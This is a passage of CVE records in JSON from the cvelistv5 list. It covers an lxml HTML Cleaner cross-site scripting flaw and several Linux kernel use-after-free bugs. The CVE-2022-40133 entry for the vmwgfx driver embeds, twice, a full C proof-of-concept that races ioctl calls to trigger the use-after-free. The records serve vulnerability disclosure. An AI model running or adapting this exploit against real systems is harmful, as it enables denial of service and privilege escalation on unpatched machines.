"x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQ4SPKJX3RRJK4UWA6FXCRHD2TVRQI44/" }, { "name": "FEDORA-2021-9f9e7c5c4f", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZGNET2A4WGLSUXLBFYKNC5PXHQMI3I7/" }, { "name": "[debian-lts-announce] 20211230 [SECURITY] [DLA 2871-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00037.html" }, { "name": "DSA-5043", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5043" }, { "name": "FEDORA-2022-96c79bf003", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TUIS2KE3HZ2AAQKXFLTJFZPP2IFHJTC7/" }, { "name": "FEDORA-2022-7129fbaeed", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V2XMOM5PFT6U5AAXY6EFNT5JZCKKHK2V/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0005/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "GLSA-202208-06", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202208-06" } ], "source": { "advisory": "GHSA-55x5-fj6c-h6m8", "discovery": "UNKNOWN" }, "title": "HTML Cleaner allows crafted and SVG embedded scripts to pass through", "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2021-43818", "STATE": "PUBLIC", "TITLE": "HTML Cleaner allows crafted and SVG embedded scripts to pass through" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "lxml", "version": { "version_data": [ { "version_value": "\u003c 4.6.5" } ] } } ] }, "vendor_name": "lxml" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "lxml is a library for processing XML and HTML in the Python language. Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5 to receive a patch. There are no known workarounds available." } ] }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)" } ] }, { "description": [ { "lang": "eng", "value": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/lxml/lxml/security/advisories/GHSA-55x5-fj6c-h6m8", "refsource": "CONFIRM", "url": "https://github.com/lxml/lxml/security/advisories/GHSA-55x5-fj6c-h6m8" }, { "name": "https://github.com/lxml/lxml/commit/12fa9669007180a7bb87d990c375cf91ca5b664a", "refsource": "MISC", "url": "https://github.com/lxml/lxml/commit/12fa9669007180a7bb87d990c375cf91ca5b664a" }, { "name": "https://github.com/lxml/lxml/commit/a3eacbc0dcf1de1c822ec29fb7d090a4b1712a9c#diff-59130575b4fb2932c957db2922977d7d89afb0b2085357db1a14615a2fcad776", "refsource": "MISC", "url": "https://github.com/lxml/lxml/commit/a3eacbc0dcf1de1c822ec29fb7d090a4b1712a9c#diff-59130575b4fb2932c957db2922977d7d89afb0b2085357db1a14615a2fcad776" }, { "name": "https://github.com/lxml/lxml/commit/f2330237440df7e8f39c3ad1b1aa8852be3b27c0", "refsource": "MISC", "url": "https://github.com/lxml/lxml/commit/f2330237440df7e8f39c3ad1b1aa8852be3b27c0" }, { "name": "FEDORA-2021-6e8fb79f90", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQ4SPKJX3RRJK4UWA6FXCRHD2TVRQI44/" }, { "name": "FEDORA-2021-9f9e7c5c4f", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGNET2A4WGLSUXLBFYKNC5PXHQMI3I7/" }, { "name": "[debian-lts-announce] 20211230 [SECURITY] [DLA 2871-1] lxml security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00037.html" }, { "name": "DSA-5043", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5043" }, { "name": "FEDORA-2022-96c79bf003", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TUIS2KE3HZ2AAQKXFLTJFZPP2IFHJTC7/" }, { "name": "FEDORA-2022-7129fbaeed", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V2XMOM5PFT6U5AAXY6EFNT5JZCKKHK2V/" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "https://security.netapp.com/advisory/ntap-20220107-0005/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220107-0005/" }, { "name": "https://www.oracle.com/security-alerts/cpujul2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "GLSA-202208-06", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202208-06" } ] }, "source": { "advisory": "GHSA-55x5-fj6c-h6m8", "discovery": "UNKNOWN" } } } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2021-43818", "datePublished": "2021-12-13T18:05:12", "dateReserved": "2021-11-16T00:00:00", "dateUpdated": "2024-08-04T04:03:08.992Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3141
Vulnerability from cvelistv5
Published
2023-06-09 00:00
Modified
2024-08-02 06:48
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in r592_remove in drivers/memstick/host/r592.c in media access in the Linux Kernel. This flaw allows a local attacker to crash the system at device disconnect, possibly leading to a kernel information leak.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:48:07.922Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/CAPDyKFoV9aZObZ5GBm0U_-UVeVkBN_rAG-kH3BKoP4EXdYM4bw%40mail.gmail.com/t/" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=63264422785021704c39b38f65a78ab9e4a186d7" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230706-0004/" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Kenrel version prior to Kernel 6.4-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in r592_remove in drivers/memstick/host/r592.c in media access in the Linux Kernel. This flaw allows a local attacker to crash the system at device disconnect, possibly leading to a kernel information leak." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-19T23:06:24.549591", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/CAPDyKFoV9aZObZ5GBm0U_-UVeVkBN_rAG-kH3BKoP4EXdYM4bw%40mail.gmail.com/t/" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.4" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=63264422785021704c39b38f65a78ab9e4a186d7" }, { "url": "https://security.netapp.com/advisory/ntap-20230706-0004/" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3141", "datePublished": "2023-06-09T00:00:00", "dateReserved": "2023-06-07T00:00:00", "dateUpdated": "2024-08-02T06:48:07.922Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6817
Vulnerability from cvelistv5
Published
2023-12-18 14:37
Modified
2024-08-02 08:42
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.222Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/12/22/6" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.7", "status": "affected", "version": "5.6", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Lonial Kong" }, { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Xingyuan Mo" } ], "datePublic": "2023-12-06T16:14:37+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.\n\nWe recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-18T14:37:05.986Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a" }, { "url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a" }, { "url": "http://www.openwall.com/lists/oss-security/2023/12/22/6" }, { "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-6817", "datePublished": "2023-12-18T14:37:05.986Z", "dateReserved": "2023-12-14T11:29:13.252Z", "dateUpdated": "2024-08-02T08:42:08.222Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4921
Vulnerability from cvelistv5
Published
2023-09-12 19:45
Modified
2024-08-02 07:44
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: sch_qfq component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:44:52.210Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.6", "status": "affected", "version": "3.8", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "valis" } ], "datePublic": "2023-09-05T06:54:12+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nWhen the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().\n\nWe recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-12T19:45:19.367Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8" }, { "url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: sch_qfq component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4921", "datePublished": "2023-09-12T19:45:19.367Z", "dateReserved": "2023-09-12T19:22:10.389Z", "dateUpdated": "2024-08-02T07:44:52.210Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40133
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 03:49
Severity ?
EPSS score ?
Summary
There is an UAF vulnerability in vmwgfx driver
References
▼ | URL | Tags |
---|---|---|
https://bugzilla.openanolis.cn/show_bug.cgi?id=2075 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:14:39.687Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-09T14:39:51", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" ], "discovery": "INTERNAL" }, "title": "There is an UAF vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "AKA": "Anolis", "ASSIGNER": "security@openanolis.org", "DATE_PUBLIC": "2022-09-06T07:00:00.000Z", "ID": "CVE-2022-40133", "STATE": "PUBLIC", "TITLE": "There is an UAF vulnerability in vmwgfx driver" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "5.13.0-52", "version_value": "v4.20-rc1" } ] } } ] }, "vendor_name": "Linux" } ] } }, "credit": [ { "lang": "eng", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ] }, "exploit": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}" } ], "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-416 Use After Free" } ] } ] }, "references": { "reference_data": [ { "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075", "refsource": "MISC", "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } 